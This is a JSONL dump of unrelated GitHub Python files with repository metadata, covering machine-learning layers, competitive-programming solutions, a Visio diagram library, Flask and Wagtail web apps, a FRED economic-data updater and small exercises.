self.num_capsule, self.dim_capsule))\r\n u_hat_vecs = K.permute_dimensions(u_hat_vecs, (0, 2, 1, 3))\r\n # final u_hat_vecs.shape = [None, num_capsule, input_num_capsule, dim_capsule]\r\n\r\n b = K.zeros_like(u_hat_vecs[:, :, :, 0]) # shape = [None, num_capsule, input_num_capsule]\r\n for i in range(self.routings):\r\n b = K.permute_dimensions(b, (0, 2, 1)) # shape = [None, input_num_capsule, num_capsule]\r\n c = K.softmax(b)\r\n c = K.permute_dimensions(c, (0, 2, 1))\r\n b = K.permute_dimensions(b, (0, 2, 1))\r\n outputs = self.activation(K.batch_dot(c, u_hat_vecs, [2, 2]))\r\n if i < self.routings - 1:\r\n b = K.batch_dot(outputs, u_hat_vecs, [2, 3])\r\n\r\n return outputs\r\n\r\n def compute_output_shape(self, input_shape):\r\n return (None, self.num_capsule, self.dim_capsule)","repo_name":"zle1992/atec","sub_path":"models/layers/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":7351,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"48"} +{"seq_id":"25655435005","text":"import sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\ndef factorization(n):\n arr = []\n temp = n\n for i in range(2, int(-(-n ** 0.5 // 1)) + 1):\n if temp % i == 0:\n cnt = 0\n while temp % i == 0:\n cnt += 1\n temp //= i\n arr.append([i, cnt])\n \n if temp != 1:\n arr.append([temp, 1])\n if not arr:\n arr.append([n, 1])\n \n return arr\n\n\ndef mod_div(x, y, mod=10 ** 9 + 7):\n return x * pow(y, mod - 2, mod) % mod\n\n\ndef solve():\n _ = int(rl())\n A = list(map(int, rl().split()))\n MOD = 10 ** 9 + 7\n \n max_exp = defaultdict(int)\n for ai in A:\n facts = factorization(ai)\n for fact, m in facts:\n if max_exp[fact] < m:\n max_exp[fact] = m\n \n lcm = 1\n for num, exp in max_exp.items():\n lcm = lcm * pow(num, exp, MOD) % MOD\n \n ans = sum([mod_div(lcm, ai) for ai in A]) % MOD\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC152/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74681547984","text":"from __future__ import annotations\nimport shutil\nimport os\n\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import Element\n\nimport vsdx\nfrom .shapes import Shape\n\n\nclass Connect:\n \"\"\"Connect class to represent a connection between two `Shape` objects\"\"\"\n def __init__(self, xml: Element=None, page: vsdx.Page=None):\n if page is None:\n return\n if type(xml) is Element: # create from xml\n self.xml = xml\n self.page = page # type: vsdx.Page\n self.from_id = xml.attrib.get('FromSheet') # ref to the connector shape\n self.to_id = xml.attrib.get('ToSheet') # ref to the shape where the connector terminates\n self.from_rel = xml.attrib.get('FromCell') # i.e. EndX / BeginX\n self.to_rel = xml.attrib.get('ToCell') # i.e. PinX\n\n @staticmethod\n def create(page: vsdx.Page=None, from_shape: Shape = None, to_shape: Shape = None) -> Shape:\n \"\"\"Create a new Connect object between from_shape and to_shape\n\n :returns: a new Connect object\n :rtype: Shape\n \"\"\"\n\n if from_shape and to_shape: # create new connector shape and connect items between this and the two shapes\n # create new connect shape and get id\n media = vsdx.Media()\n connector_shape = media.straight_connector.copy(page) # default to straight connector\n connector_shape.text = '' # clear text used to find shape\n if not os.path.exists(page.vis._masters_folder):\n # Add masters folder to directory if not already present\n shutil.copytree(media._media_vsdx._masters_folder, page.vis._masters_folder)\n page.vis.load_master_pages() # load copied master page files into VisioFile object\n # add new master to document relationship\n page.vis._add_document_rel(rel_type=\"http://schemas.microsoft.com/visio/2010/relationships/masters\",\n target=\"masters/masters.xml\")\n # create masters/master1 elements in [Content_Types].xml\n page.vis._add_content_types_override(content_type=\"application/vnd.ms-visio.masters+xml\",\n part_name_path=\"/visio/masters/masters.xml\")\n page.vis._add_content_types_override(content_type=\"application/vnd.ms-visio.master+xml\",\n part_name_path=\"/visio/masters/master1.xml\")\n elif connector_shape.shape_name not in page.vis._titles_of_parts_list():\n print(f\"Warning: Updating existing Page/Master relationships not yet fully implemented. This may cause unexpected outputs.\")\n # vsdx has masters - but not this shape\n # todo: Complete this scenario\n #print(\"conn master page\", connector_shape.master_shape.page.filename)\n #print(\"max page file num\", [p.filename[-5:-4] for p in page.vis.master_pages])\n #print(\"max page id\", [p.page_id for p in page.vis.master_pages])\n rel_num = max([int(p.filename[-5:-4]) for p in page.vis.master_pages]) +1\n master_file_path = os.path.join(page.vis.directory, 'visio', 'masters', f'master{rel_num}.xml')\n #print(f\"m_num={rel_num} master_file_path={master_file_path}\")\n shutil.copy(connector_shape.master_shape.page.filename, master_file_path)\n # todo: ensure master page ID and RId is unique, update shape master_id to refer to new master\n # todo: update mast file name, and add content type override\n # todo: update masters.xml file contents?\n # todo: update visio/pages/_rels/page3.xml.rels - add: \n rels = page.rels_xml.getroot()\n new_rel = ET.fromstring(f'')\n new_rel.attrib['Id'] = f\"rID{rel_num}\"\n new_rel.attrib['Target'] = f\"../masters/master{rel_num}.xml\"\n rels.append(new_rel)\n page.vis._add_content_types_override(content_type=\"application/vnd.ms-visio.master+xml\",\n part_name_path=f\"/visio/masters/master{rel_num}.xml\")\n else:\n # vsdx has this master shape, but not related to this page\n master_page = page.vis.master_index.get(connector_shape.shape_name) # type: vsdx.Page\n rel_num = int(master_page.rel_id[-1])\n rels = page.rels_xml.getroot()\n new_rel = ET.fromstring(f'')\n new_rel.attrib['Id'] = master_page.rel_id\n new_rel.attrib['Target'] = \"../masters/master1.xml\"\n rels.append(new_rel)\n\n # update HeadingPairs and TitlesOfParts in app.xml\n if page.vis._get_app_xml_value('Masters') is None:\n page.vis._set_app_xml_value('Masters', '1')\n\n if connector_shape.shape_name not in page.vis._titles_of_parts_list(): # todo: replace static string with name from shape\n page.vis._add_titles_of_parts_item(connector_shape.shape_name)\n\n # copy style used by new connector shape\n if not page.vis._get_style_by_id(connector_shape.master_shape.line_style_id):\n # assume same if is ok, todo: use names for match and increment IDs\n media_style = media._media_vsdx._get_style_by_id(connector_shape.master_shape.line_style_id)\n page.vis._style_sheets().append(media_style)\n media._media_vsdx.close_vsdx()\n\n # set Begin and End Trigger formulae for the new shape - linking to shapes in destination page\n beg_trigger = connector_shape.cells.get('BegTrigger')\n beg_trigger.formula = beg_trigger.formula.replace('Sheet.1!', f'Sheet{from_shape.ID}!')\n end_trigger = connector_shape.cells.get('EndTrigger')\n end_trigger.formula = end_trigger.formula.replace('Sheet.2!', f'Sheet{to_shape.ID}!')\n\n # create connect relationships\n # todo: FromPart=\"12\" and ToPart=\"3\" represent the part of a shape to connection is from/to\n end_connect_xml = f''\n beg_connect_xml = f''\n\n # Add these new connection relationships to the page\n page.add_connect(Connect(xml=ET.fromstring(end_connect_xml), page=page))\n page.add_connect(Connect(xml=ET.fromstring(beg_connect_xml), page=page))\n #print(vsdx.pretty_print_element(connector_shape.xml))\n #print(connector_shape.geometry)\n\n connector_shape.set_start_and_finish(from_shape.center_x_y, to_shape.center_x_y)\n print([(m.rel_id, m.page_id) for m in page.vis.master_pages])\n return connector_shape\n\n @property\n def shape_id(self):\n # ref to the shape where the connector terminates - convenience property\n return self.to_id\n\n @property\n def shape(self) -> Shape:\n return self.page.find_shape_by_id(self.shape_id)\n\n @property\n def connector_shape_id(self):\n # ref to the connector shape - convenience property\n return self.from_id\n\n @property\n def connector_shape(self) -> Shape:\n return self.page.find_shape_by_id(self.connector_shape_id)\n\n def __repr__(self):\n return f\"Connect: from={self.from_id} to={self.to_id} connector_id={self.connector_shape_id} shape_id={self.shape_id}\"\n","repo_name":"dave-howard/vsdx","sub_path":"vsdx/connectors.py","file_name":"connectors.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"48"} +{"seq_id":"24447186615","text":"def get_base_2(n):\n '''\n Algoritmul de schimbare a unui numar din baza 10 in baza 2\n :param n: Numarul citit\n :return: Returnam numarul in baza 2\n '''\n r=0\n p=1\n nr=0\n while n!=0:\n r=n%2\n n=n//2\n nr=nr+r*p\n p=p*10\n print (nr)\n\n\ndef test_get_base_2():\n assert get_base_2(730)== 1011011010\n assert get_base_2(251)== 11111011\n\n\ndef oglindit(n):\n '''\n Functie pentru a afla oglinditul unui numar.\n :param n: Citim numarul caruia ii dorim oglinditul\n :return: Returnam oglinditul numarului\n '''\n\n ogl=0\n while n!=0:\n ogl=ogl*10+n%10\n n=n//10\n return ogl\n\n\ndef is_antipalindrome(n):\n '''\n Aflam daca numarul este antipalindrom\n :param n: Numarul citit\n :return: Returnam prin bool daca numarul este antipalindrom sau nu\n '''\n c1=0\n c2=0\n invers=oglindit(n)\n while n!=0:\n c1=n%10\n c2=invers%10\n n=n//10\n invers=invers//10\n if c1==c2:\n return False\n\n\n return True\n\n\ndef test_is_antipalindrome():\n assert test_is_antipalindrome(2783) == True\n assert test_is_antipalindrome(2773) == False\n\n\ndef is_palindrome(n):\n '''\n Verificam in aceasta functie daca un numar este palindrom\n :param n: Citim n\n :return: Returnam prin bool daca numarul este palindrom sau nu\n '''\n ogl=0\n palindrom=n;\n while n!=0:\n ogl=ogl*10+n%10\n n=n//10\n if ogl==palindrom:\n return True\n else:\n return False\n\n\ndef test_is_palindrome():\n assert is_palindrome(121) == True\n assert is_palindrome(312) == False\n\ndef main():\n\n while True:\n print('1. Transformare numar in baza 2 .')\n print('2. Este antipalindrom?')\n print('3 Este Palindrom?')\n optiune=input('Alege optiunea:')\n if optiune == '1':\n n=int(input('Dati un numar'))\n get_base_2(n)\n elif optiune == '2':\n n =int(input('Dati un numar'))\n print(is_antipalindrome(n))\n elif optiune== '3':\n n=int(input('Dati un numar'))\n print (is_palindrome(n))\n elif optiune == 'x':\n break\n else:\n print('Optiune invalida.')\n\n\nif __name__ == '__main__':\n main()","repo_name":"AP-MI-2021/lab-2-RuginaAlex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8207180405","text":"\"\"\"empty message\n\nRevision ID: d16a24635397\nRevises: 6d1746989e64\nCreate Date: 2022-09-05 15:16:40.030538\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd16a24635397'\ndown_revision = '6d1746989e64'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('settings', sa.Column('webrtcPlaybackEnabled', sa.Boolean(), nullable=True))\n op.add_column('settings', sa.Column('webrtcSignalProtocol', sa.String(length=128), nullable=True))\n op.add_column('settings', sa.Column('webrtcSignalURL', sa.String(length=1024), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('settings', 'webrtcSignalURL')\n op.drop_column('settings', 'webrtcSignalProtocol')\n op.drop_column('settings', 'webrtcPlaybackEnabled')\n # ### end Alembic commands ###\n","repo_name":"Open-Streaming-Platform/open-streaming-platform","sub_path":"migrations/versions/d16a24635397_.py","file_name":"d16a24635397_.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"48"} +{"seq_id":"42407151843","text":"import json\r\nimport plotly\r\nimport pandas as pd\r\nimport re\r\nfrom collections import Counter\r\n\r\n# import NLP libraries\r\nfrom tokenizer_function import Tokenizer, tokenize\r\n\r\nfrom flask import Flask\r\nfrom flask import render_template, request, jsonify\r\nfrom plotly.graph_objs import Bar\r\nfrom sklearn.externals import joblib\r\nfrom sqlalchemy import create_engine\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.before_first_request\r\n\r\ndef load_model_data():\r\n global df\r\n global model\r\n # load data\r\n\r\n engine = create_engine('sqlite:///data/DisasterResponse.db')\r\n df = pd.read_sql_table('DisasterResponse', engine)\r\n\r\n # load model\r\n model = joblib.load(\"models/adaboost_model.pkl\")\r\n\r\n# index webpage displays cool visuals and receives user input text for model\r\n@app.route('/')\r\n@app.route('/index')\r\n\r\ndef index():\r\n \r\n # extract data needed for visuals\r\n # Message counts of different generes\r\n genre_counts = df.groupby('genre').count()['message']\r\n genre_names = list(genre_counts.index)\r\n\r\n # Message counts for different categories\r\n cate_counts_df = df.iloc[:, 4:].sum().sort_values(ascending=False)\r\n cate_counts = list(cate_counts_df)\r\n cate_names = list(cate_counts_df.index)\r\n\r\n # Top keywords in Social Media in percentages\r\n social_media_messages = ' '.join(df[df['genre'] == 'social']['message'])\r\n social_media_tokens = tokenize(social_media_messages)\r\n social_media_wrd_counter = Counter(social_media_tokens).most_common()\r\n social_media_wrd_cnt = [i[1] for i in social_media_wrd_counter]\r\n social_media_wrd_pct = [i/sum(social_media_wrd_cnt) *100 for i in social_media_wrd_cnt]\r\n social_media_wrds = [i[0] for i in social_media_wrd_counter]\r\n\r\n # Top keywords in Direct in percentages\r\n direct_messages = ' '.join(df[df['genre'] == 'direct']['message'])\r\n direct_tokens = tokenize(direct_messages)\r\n direct_wrd_counter = Counter(direct_tokens).most_common()\r\n direct_wrd_cnt = [i[1] for i in direct_wrd_counter]\r\n direct_wrd_pct = [i/sum(direct_wrd_cnt) * 100 for i in direct_wrd_cnt]\r\n direct_wrds = [i[0] for i in direct_wrd_counter]\r\n\r\n # create visuals\r\n\r\n graphs = [\r\n # Histogram of the message genere\r\n {\r\n 'data': [\r\n Bar(\r\n x=genre_names,\r\n y=genre_counts\r\n )\r\n ],\r\n\r\n 'layout': {\r\n 'title': 'Distribution of Message Genres',\r\n 'yaxis': {\r\n 'title': \"Count\"\r\n },\r\n 'xaxis': {\r\n 'title': \"Genre\"\r\n }\r\n }\r\n },\r\n # histogram of social media messages top 30 keywords \r\n {\r\n 'data': [\r\n Bar(\r\n x=social_media_wrds[:50],\r\n y=social_media_wrd_pct[:50]\r\n )\r\n ],\r\n\r\n 'layout':{\r\n 'title': \"Top 50 Keywords in Social Media Messages\",\r\n 'xaxis': {'tickangle':60\r\n },\r\n 'yaxis': {\r\n 'title': \"% Total Social Media Messages\" \r\n }\r\n }\r\n }, \r\n\r\n # histogram of direct messages top 30 keywords \r\n {\r\n 'data': [\r\n Bar(\r\n x=direct_wrds[:50],\r\n y=direct_wrd_pct[:50]\r\n )\r\n ],\r\n\r\n 'layout':{\r\n 'title': \"Top 50 Keywords in Direct Messages\",\r\n 'xaxis': {'tickangle':60\r\n },\r\n 'yaxis': {\r\n 'title': \"% Total Direct Messages\" \r\n }\r\n }\r\n }, \r\n\r\n\r\n\r\n # histogram of messages categories distributions\r\n {\r\n 'data': [\r\n Bar(\r\n x=cate_names,\r\n y=cate_counts\r\n )\r\n ],\r\n\r\n 'layout':{\r\n 'title': \"Distribution of Message Categories\",\r\n 'xaxis': {'tickangle':60\r\n },\r\n 'yaxis': {\r\n 'title': \"count\" \r\n }\r\n }\r\n }, \r\n\r\n ]\r\n \r\n # encode plotly graphs in JSON\r\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\r\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\r\n \r\n # render web page with plotly graphs\r\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\r\n\r\n\r\n# web page that handles user query and displays model results\r\n@app.route('/go')\r\ndef go():\r\n # save user input in query\r\n query = request.args.get('query', '') \r\n\r\n # use model to predict classification for query\r\n classification_labels = model.predict([query])[0]\r\n classification_results = dict(zip(df.columns[4:], classification_labels))\r\n\r\n # This will render the go.html Please see that file. \r\n return render_template(\r\n 'go.html',\r\n query=query,\r\n classification_result=classification_results\r\n )\r\n\r\n\r\ndef main():\r\n app.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"chen-bowen/Data_Science_Portfolio","sub_path":"Project 5 - Disaster Response Pipeline/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"37714428014","text":"\"\"\"\n마지막 업데이트 : 2017-09-13\n파일명 : 05_update.py\n\nfred update url을 통해서 가져온 series_id 들을 가지고서\n03, 04 파일을 thread 없이 실행하여 업데이트 한다. 하루의 업데이트 개수는 수천건 정도이다.\n현재 이력(빈티지)관리에 대해서는 진행된 바 없으며, 파일을 받는 시점에서 깨끗이 지우고 받는다.\n\"\"\"\nfrom fred.path import *\nfrom fred.util import *\n\n# path 없으면 자동 생성\nif not os.path.exists(update_observ_path):\n os.makedirs(update_observ_path)\n\ndelete_update_files(update_series_path)\ndelete_update_files(update_observ_path)\n\nconn = HTTPSConnection(fred_domain)\n\ncnt = 0\nmethod_cnt = 0\nis_end = False\n\n# api 상 1000이 기본값, 바꾸게되면 limit, offset도 동일하게 적용해야 데이터 안 꼬인다.\nchunk_unit = 1000\nobserv_chunk_unit = 100000\nupdate_offset = 0\n\n# 업데이트 시작 시간을 담아둠\nthis_start_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\nprint(this_start_time)\n\n# 마지막 지난 업데이트 시간 파일이 없으면 하루 전으로 생성\ntry:\n file = open(last_update_time, 'r')\nexcept IOError:\n with open(last_update_time, 'w', encoding='utf-8') as f:\n d = datetime.now() - timedelta(days=1)\n f.write(d.strftime(time_format))\n\n# 마지막 지난 업데이트 시작 시간을 가져옴\nlast_start_time = datetime.strptime(open(last_update_time).read().strip(), time_format)\nprint(last_start_time)\n\n\ndef get_update_series(series_list):\n global cnt\n global method_cnt\n global update_offset\n global is_end\n\n method_cnt += 1\n\n print('[method] get_update_series start count :', method_cnt)\n\n for series_item in series_list:\n cnt += 1\n update_id = series_item['id']\n d = series_item['last_updated']\n update_time = datetime.strptime(d[:d.rfind('-')], time_format) + timedelta(hours=9)\n\n # last_update_start_time.txt 보다 last_updated 가 이전이 되면 더 이상 업데이트는 없는 걸로 판단\n is_end = update_time < last_start_time\n print(cnt, update_time.strftime(time_format), update_id)\n\n if is_end:\n # 업데이트 '시작'을 기록하고 종료.. 업데이트 '종료' 시간이 아닌 이유는, 기록 되는 동안에도 시간이\n # 흘러가기 때문에,..\n # 다만 테스트로 돌린 경우라면 마지막 업데이트 시간을 갱신하지 않을 것.\n if chunk_unit == 1000:\n with open(last_update_time, 'w', encoding='utf-8') as f:\n f.write(this_start_time)\n\n break\n else:\n try:\n # series meta 업데이트\n filename = update_series_path + update_id + '.json'\n\n with open(filename, 'w', encoding='utf-8') as f2:\n ret2 = req(fred_series_url + update_id)['seriess'][0]\n f2.write(json.dumps(ret2))\n except:\n print('cannot update series meta from series_id', update_id)\n\n try:\n # observ 업데이트\n ret = req(fred_series_observ_url + update_id + '&limit=' + str(observ_chunk_unit) + '&offset=' + str(0))\n observ_count = ret['count']\n v = observ_count // observ_chunk_unit\n if observ_count % observ_chunk_unit:\n v += 1\n o_l = []\n o_l += ret['observations']\n for mult in range(1, v):\n # print(series_id, mult, v)\n off = observ_chunk_unit * mult\n o_l += req(fred_series_observ_url + update_id + '&limit=' + str(observ_chunk_unit) + '&offset='\n + str(off))['observations']\n\n ret['observations'] = o_l\n with open(update_observ_path + update_id + '.json', 'w', encoding='utf-8') as f:\n f.write(json.dumps(ret))\n except:\n print('cannot update observation from series_id', update_id)\n\n if not is_end:\n # is_end가 아니면 여기까지 도달.. limit offset 활용..\n update_offset += chunk_unit\n update_series = req(fred_series_update_url + '&limit=' + str(chunk_unit) + '&offset=' + str(update_offset))['seriess']\n get_update_series(update_series)\n\n\n# 업데이트 시작\nupdate_series = req(fred_series_update_url)['seriess']\nget_update_series(update_series)\n","repo_name":"seraekim/srkim-py-fred","sub_path":"fred/05_update.py","file_name":"05_update.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"744361826","text":"class Solution:\n def __init__(self):\n self.l = []\n\n def permute(self, nums):\n n = len(nums)\n self.helper(0, nums, n)\n return self.l\n\n def helper(self, index, nums, n):\n if index == n-1:\n self.l.append(nums.copy())\n return\n\n for i in range(index, n):\n temp = nums[index]\n nums[index] = nums[i]\n nums[i] = temp\n self.helper(index + 1, nums, n)\n temp = nums[index]\n nums[index] = nums[i]\n nums[i] = temp\n\ns = Solution()\nprint(s.permute([1,2,3,4,5,6,7,8,9,10]))\n\n1011123456789\n9876543210111","repo_name":"wjqssb/leetcode","sub_path":"Medium/Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38460620420","text":"import json\r\n\r\nf = open('genresForSorting.json', )\r\n\r\n# returns JSON object as\r\n# a dictionary\r\ndata = json.load(f)\r\n\r\ndef bubbleSort(arr, genreArr):\r\n n = len(arr)\r\n\r\n # Traverse through all array elements\r\n for i in range(n - 1):\r\n # range(n) also work but outer loop will repeat one time more than needed.\r\n\r\n # Last i elements are already in place\r\n for j in range(0, n - i - 1):\r\n\r\n # traverse the array from 0 to n-i-1\r\n # Swap if the element found is greater\r\n # than the next element\r\n if arr[j] < arr[j + 1]:\r\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\r\n genreArr[j], genreArr[j + 1] = genreArr[j + 1], genreArr[j]\r\n return genreArr\r\n\r\ndef searchForGenres(values):\r\n if len(values) != 3:\r\n return None\r\n max = 0\r\n pos = 0\r\n for i in range(0, 3):\r\n if (values[i] > max):\r\n max = values[i]\r\n pos = i\r\n print(pos)\r\n sortedGenres = []\r\n sortedGenresValues = []\r\n for i in data:\r\n positiveValues = i['positive values']\r\n negativeValues = i['negative values']\r\n if (positiveValues[pos] > 0):\r\n sortedGenres.append(i['name']);\r\n sum = 0\r\n for j in range(0, 3):\r\n sum += (values[j] * positiveValues[j])\r\n sum += (values[j] * negativeValues[j])\r\n sortedGenresValues.append(sum)\r\n j = 0\r\n for i in sortedGenres:\r\n print(i + \": \" + str(sortedGenresValues[j]))\r\n j = j + 1\r\n sortedGenres = bubbleSort(sortedGenresValues, sortedGenres)\r\n print(sortedGenres)\r\n\r\n\r\n\r\nsearchForGenres([10, 10, 3])","repo_name":"CS196Illinois/Group-5","sub_path":"database/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2781713963","text":"from collections import Counter\nfrom typing import List, Callable\n\nfrom utils import read_file\n\ndata = read_file('03')\n\n\ndef bin_to_dec(binary: str) -> int:\n return int(binary, 2)\n\n\ndef get_power_consumption(report: List[str]) -> int:\n cols = list(zip(*report))\n gamma_rate = ''\n epsilon_rate = ''\n for col in cols:\n gamma, epsilon = Counter(col).most_common()\n gamma_rate += gamma[0][0]\n epsilon_rate += epsilon[0][0]\n return bin_to_dec(gamma_rate) * bin_to_dec(epsilon_rate)\n\n\nprint(get_power_consumption(data))\n\n\ndef oxygen_generator_rating(cnt: Counter, report: List[str], i: int) -> List[str]:\n mc = cnt.most_common()[0][0]\n if len(set(cnt.values())) == 1:\n mc = '1'\n return [bit_str for bit_str in report if bit_str[i] == mc]\n\n\ndef co2_scrubber_rating(cnt: Counter, report: List[str], i: int) -> List[str]:\n mc = cnt.most_common()[1][0]\n if len(set(cnt.values())) == 1:\n mc = '0'\n return [bit_str for bit_str in report if bit_str[i] == mc]\n\n\ndef get_rating(report: List[str], rating_fn: Callable) -> int:\n r = report.copy()\n i = 0\n while len(r) > 1:\n col = [ln[i] for ln in r]\n cnt = Counter(col)\n r = rating_fn(cnt, r, i)\n i += 1\n return bin_to_dec(r[0])\n\n\ndef get_life_support_rating(report: List[str]) -> int:\n return get_rating(report, oxygen_generator_rating) * get_rating(report, co2_scrubber_rating)\n\n\nprint(get_life_support_rating(data))\n","repo_name":"sschwa12/aoc2021","sub_path":"03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10813768815","text":"from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.db import models\nfrom django.shortcuts import render\n\nfrom wagtail.admin.panels import FieldPanel\nfrom wagtail.fields import RichTextField\nfrom wagtail.models import Page\nfrom wagtail.search import index\n\n\nclass NewsletterPage(Page):\n date = models.DateField(\"Newsletter date\")\n intro = RichTextField(blank=True)\n body = RichTextField()\n\n content_panels = Page.content_panels + [\n FieldPanel(\"date\"),\n FieldPanel(\"intro\"),\n FieldPanel(\"body\"),\n ]\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n if request.GET.get(\"email\", \"false\") == \"true\":\n context[\"is_email\"] = True\n\n return context\n\n\nclass NewsletterIndexPage(Page):\n intro = RichTextField(blank=True)\n body = RichTextField()\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n @property\n def newsletters(self):\n # Get list of blog pages that are descendants of this page\n newsletters = NewsletterPage.objects.live().descendant_of(self)\n\n # Order by most recent date first\n newsletters = newsletters.order_by(\"-date\")\n\n return newsletters\n\n def serve(self, request):\n # Get blogs\n newsletters = self.newsletters\n\n # Pagination\n page = request.GET.get(\"page\")\n paginator = Paginator(newsletters, 5) # Show 5 blogs per page\n try:\n newsletters = paginator.page(page)\n except PageNotAnInteger:\n newsletters = paginator.page(1)\n except EmptyPage:\n newsletters = paginator.page(paginator.num_pages)\n\n return render(\n request, self.template, {\"self\": self, \"newsletters\": newsletters}\n )\n\n content_panels = Page.content_panels + [\n FieldPanel(\"intro\"),\n FieldPanel(\"body\"),\n ]\n\n\nclass NewsletterEmailAddress(models.Model):\n email = models.EmailField()\n signed_up_at = models.DateTimeField(null=True, auto_now_add=True)\n","repo_name":"wagtail/wagtail.org","sub_path":"wagtailio/newsletter/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"27558004834","text":"import json\r\nimport re\r\nimport os\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\ndef user_video_data():\r\n # videos_played= [[]]\r\n with open(\r\n \"/Users/shubham.bajpai/Documents/User_Engagement/source/Data_Extraction/video_process/user_id_daywise_timespent.json\") as json_data:\r\n x = json.load(json_data)\r\n user_data = {}\r\n max_videos = {}\r\n max_time = {}\r\n for i in range(15, 40):\r\n max_videos[i] = 1.0\r\n max_time[i] = 1.0\r\n for feature in x:\r\n video = {}\r\n for i in range(15, 40):\r\n video[i] = [0, 0]\r\n for days in x[feature].keys():\r\n year = days[:4]\r\n month = days[5:7]\r\n day = days[8:]\r\n # print year\r\n dt = datetime.date(int(year), int(month), int(day))\r\n week_number = dt.isocalendar()[1]\r\n if year == '2017' and week_number < 40:\r\n if week_number in video:\r\n videos = 0.0\r\n time = 0.0\r\n for key in x[feature][days].keys():\r\n # print x[feature][key]\r\n videos += 1\r\n time += float(x[feature][days][key])\r\n # print time, videos\r\n if max_videos[week_number] < videos:\r\n max_videos[week_number] = videos\r\n if max_time[week_number] < time:\r\n max_time[week_number] = time\r\n video[week_number] = [videos, time]\r\n user_data[feature] = video\r\n Z1 = sorted(user_data.keys())\r\n sorted_videos = []\r\n for index in Z1:\r\n sorted_videos.append(user_data[index])\r\n # print index,user_data[index]\r\n for users in Z1:\r\n key = user_data[users].keys()\r\n # print user_data[users]\r\n # print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15, 38):\r\n value.append(user_data[users][i][0])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n # plt.show()\r\n #plt.savefig(\"/Users/shubham.bajpai/Documents/User_Engagement/video_watched_plot/\" + users + \".png\")\r\n plt.clf()\r\n for users in Z1:\r\n key = user_data[users].keys()\r\n # print user_data[users]\r\n # print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15, 38):\r\n value.append(user_data[users][i][1])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n # plt.show()\r\n #plt.savefig(\"/Users/shubham.bajpai/Documents/User_Engagement/video_time_plot/\" + users + \".png\")\r\n plt.clf()\r\n for users in Z1:\r\n key=user_data[users].keys()\r\n #print user_data[users]\r\n #print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15,38):\r\n value.append(user_data[users][i][0])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n plt.savefig('video_watched.png')\r\n plt.show()\r\n plt.clf()\r\n #plt.clf()\r\n for users in Z1:\r\n key=user_data[users].keys()\r\n #print user_data[users]\r\n #print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15,38):\r\n value.append(user_data[users][i][1])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n plt.savefig('video_time_plot.png')\r\n plt.show()\r\n plt.clf()\r\n\r\n\r\nuser_video_data()","repo_name":"shubhambajpai1994/user_engagement-videoken","sub_path":"source/Data_Extraction/video_process/video_data.py","file_name":"video_data.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5671086145","text":"#\n# @lc app=leetcode id=150 lang=python3\n#\n# [150] Evaluate Reverse Polish Notation\n#\n\n# @lc code=start\nclass Solution:\n def evalRPN(self, 